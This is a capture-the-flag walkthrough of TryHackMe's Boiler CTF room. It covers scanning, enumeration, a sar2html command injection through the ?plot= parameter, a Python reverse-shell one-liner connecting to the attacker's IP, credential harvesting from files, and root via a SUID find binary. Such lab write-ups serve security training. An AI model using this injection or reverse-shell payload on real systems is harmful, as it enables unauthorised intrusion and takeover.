Boiler CTF

https://tryhackme.com/room/boilerctf2

Boiler CTF is a simple challenge with lots of enumeration to do.

As always we start with sudo nmap -sC -sV -p- -oN scan.txt $IP

and we get an output like this

PORT      STATE SERVICE VERSION

21/tcp    open  ftp     vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.9.166.168
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status

80/tcp    open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works

10000/tcp open  http    MiniServ 1.930 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
55007/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e3:ab:e1:39:2d:95:eb:13:55:16:d6:ce:8d:f9:11:e5 (RSA)
|   256 ae:de:f2:bb:b7:8a:00:70:20:74:56:76:25:c0:df:38 (ECDSA)
|_  256 25:25:83:f2:a7:75:8a:a0:46:b2:12:70:04:68:5c:cb (ED25519)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Let's begin with the first question

File extension after anon login

As we can see from the nmap scan, FTP allows anonymous logins.

Logging in and listing the directory we can see nothing.

ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp>

This means the file is hidden. Simply do ls -lahs and it will list all contents (hidden ones too) in a list format.

ftp> ls -lahs
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Aug 22  2019 .
drwxr-xr-x    2 ftp      ftp          4096 Aug 22  2019 ..
-rw-r--r--    1 ftp      ftp            74 Aug 21  2019 .info.txt
226 Directory send OK.

Awesome, we can see that there is a hidden info.txt file. With this we get the answer to the first question.

Reading the contents inside the info.txt file we see a small text that's odd but it's in perfect form of a sentence.

Whfg jnagrq gb frr vs lbh svaq vg. Yby. Erzrzore: Rahzrengvba vf gur xrl!

This must be some sort of cipher, in fact it's the simple ROT13 cipher.

You can decode it online to see that the text says.

Moving on to the second question

What is on the highest port?

Simply look at the nmap scan and you will find the answer.

What's running on port 10000?

Again, check the nmap scan.

Can you exploit the service running on that port? (yay/nay answer)

To answer this, simply enumerate the service and see if you can find anything.

Try reading the source, do another nmap scan, run gobuster and nikto to see if you can find anything.

What's CMS can you access?

Access the webpage, we are greeted with the default Apache page. This means we have to enumerate in order to find the hidden page.

Reading the robots.txt file we find a few directories that are of no use, however one thing sticks out

079 084 108 105 077 068 089 050 077 071 078 107 079 084 086 104 090 071 086 104 077 122 073 051 089 122 085 048 077 084 103 121 089 109 070 104 078 084 069 049 079 068 081 075

This one was a little bit tricky to figure it out, however after googling around you have to do a little bit of conversion.

ASCII -> Base64 -> MD5 and you'll decode the text.

After that we start gobuster to search for hidden content.

From the results we get

/manual (Status: 301)
/joomla (Status: 301)
/server-status (Status: 403)

After accessing the /joomla directory we are greeted with the default page of Joomla.

First lets start with Joomscan (https://github.com/OWASP/joomscan) and see what we can dig out.

Usage:  joomscan [options]

--url | -u <URL>                |   The Joomla URL/domain to scan.
--enumerate-components | -ec    |   Try to enumerate components.

--cookie <String>               |   Set cookie.
--user-agent | -a <User-Agent>  |   Use the specified User-Agent.
--random-agent | -r             |   Use a random User-Agent.
--timeout <Time-Out>            |   Set timeout.
--proxy=PROXY                   |   Use a proxy to connect to the target URL

           Proxy example: --proxy http://127.0.0.1:8080
                                  https://127.0.0.1:443
                                  socks://127.0.0.1:414
                                                                                        
--about                         |   About Author                                        
--help | -h                     |   This help screen.                                   
--version          

joomscan -u http://$target_ip/joomla -ec

From joomscan we get pretty much nothing except the version that Joomla is running on and the default directories. [++] Joomla 3.9.12dev

I couldn't find anything useful online to exploit that version of Joomla.

Keep enumerating, you'll know when you find it.

Let's continue with gobuster and see what we can find further.

gobuster dir -u http://$target/joomla/ -w /usr/share/wordlists/dirb/common.txt -t 40 -o boiler_ctf-gobuster-joomla-content

/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/.hta (Status: 403)
/_database (Status: 301)
/_files (Status: 301)
/_test (Status: 301)
/~www (Status: 301)
/administrator (Status: 301)
/bin (Status: 301)
/build (Status: 301)
/cache (Status: 301)
/components (Status: 301)
/_archive (Status: 301)
/images (Status: 301)
/includes (Status: 301)
/installation (Status: 301)
/index.php (Status: 200)
/language (Status: 301)
/layouts (Status: 301)
/libraries (Status: 301)
/media (Status: 301)
/modules (Status: 301)
/plugins (Status: 301)
/templates (Status: 301)
/tests (Status: 301)
/tmp (Status: 301)

Looking at what we found, the /_test directory seems out of place.

Looking the webpage we see that it is sar2html.

Searching online for sar2html exploits we find https://www.exploit-db.com/exploits/47204

It tells us that we can do Remote Code Execute through the ?plot= variable.

http://$target_ip/joomla/_test/index.php?plot=;<command>

Running ls will list the directory where it is located in the Select Host field.

Lets try to get a reverse shell.

Start netcat on our machine.

nc -lvnp 9001 (over 9000 from ippsec)

Grab a reverse shell from https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md (I used python)

export RHOST="$YOUR_IP";export RPORT=9001;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'

And paste the command in the URL.

After that we are in.

Stabilize shell!

Now once you're in, always stabilize your shell! Run these commands below.

python -c 'import pty;pty.spawn("/bin/bash")'

This will spawn you in a bash shell. Then

export TERM=xterm

This will allow you to clear your terminal. After that background shell with Ctrl + Z.

And in your own shell type

stty raw -echo;fg

This will allow you to use tab completion and the arrow keys.

fg will return you back to your shell and just press Enter.

The interesting file name in the folder?

Listing the current directory we see an interesting file.

www-data@Vulnerable:/var/www/html/joomla/_test$ ls -lahs
total 124K
4.0K drwxr-xr-x  3 www-data www-data 4.0K Aug 22  2019 .
4.0K drwxr-xr-x 25 www-data www-data 4.0K Aug 22  2019 ..
 56K -rwxr-xr-x  1 www-data www-data  53K Aug 22  2019 index.php
4.0K -rwxr-xr-x  1 www-data www-data  716 Aug 21  2019 log.txt
 52K -rwxr-xr-x  1 www-data www-data  52K Mar 19  2019 sar2html
4.0K drwxr-xr-x  3 www-data www-data 4.0K Aug 22  2019 sarFILE

Reading the contents of the file we can see that there was an SSH server running and we can see the user basterd that logged in with their password!

You can complete this with manual enumeration, but do it as you wish

Where was the other users pass stored(no extension, just the name)?

Once we acquired the credentials for the user we can login and go to the /home directory.

basterd@Vulnerable:/home$ ls -lahs
total 16K
4.0K drwxr-xr-x  4 root    root    4.0K Aug 22  2019 .
4.0K drwxr-xr-x 22 root    root    4.0K Aug 22  2019 ..
4.0K drwxr-x---  3 basterd basterd 4.0K Aug 22  2019 basterd
4.0K drwxr-x---  3 stoner  stoner  4.0K Jan 17 15:46 stoner

We do not have permission to go to stoner so lets go to our directory and see what we got there.

basterd@Vulnerable:~$ ls -lahs
total 16K
4.0K drwxr-x--- 3 basterd basterd 4.0K Aug 22  2019 .
4.0K drwxr-xr-x 4 root    root    4.0K Aug 22  2019 ..
4.0K -rwxr-xr-x 1 stoner  basterd  699 Aug 21  2019 backup.sh
   0 -rw------- 1 basterd basterd    0 Aug 22  2019 .bash_history
4.0K drwx------ 2 basterd basterd 4.0K Aug 22  2019 .cache

Where was the other users pass stored(no extension, just the name)?

Reading backup.sh we can find the credentials to the other user and login.

user.txt

It's in the users home directory.

What did you exploit to get the privileged user?

Now let's try to get root.

Running

stoner@Vulnerable:~$ sudo -l
User stoner may run the following commands on Vulnerable:
    (root) NOPASSWD: /NotThisTime/MessinWithYa

We can see nothing but a little joke. Let's start up LinEnum (https://github.com/rebootuser/LinEnum)

I copied the code and created the script in /tmp/enum.sh and executed it with bash.

One of the interesting things that LinEnum found is

[+] Possibly interesting SUID files:
-r-sr-xr-x 1 root root 232196 Feb  8  2016 /usr/bin/find

Awesome! find has a SUID bit set and we can run it to get a root shell.

We can find out how to exploit it from https://gtfobins.github.io/

root.txt

It's located in /root.

Final Thought

Boiler CTF was quite an easy challenge rated as Medium difficulty. I had fun doing this challenge, especially discovering the sar2html exploit.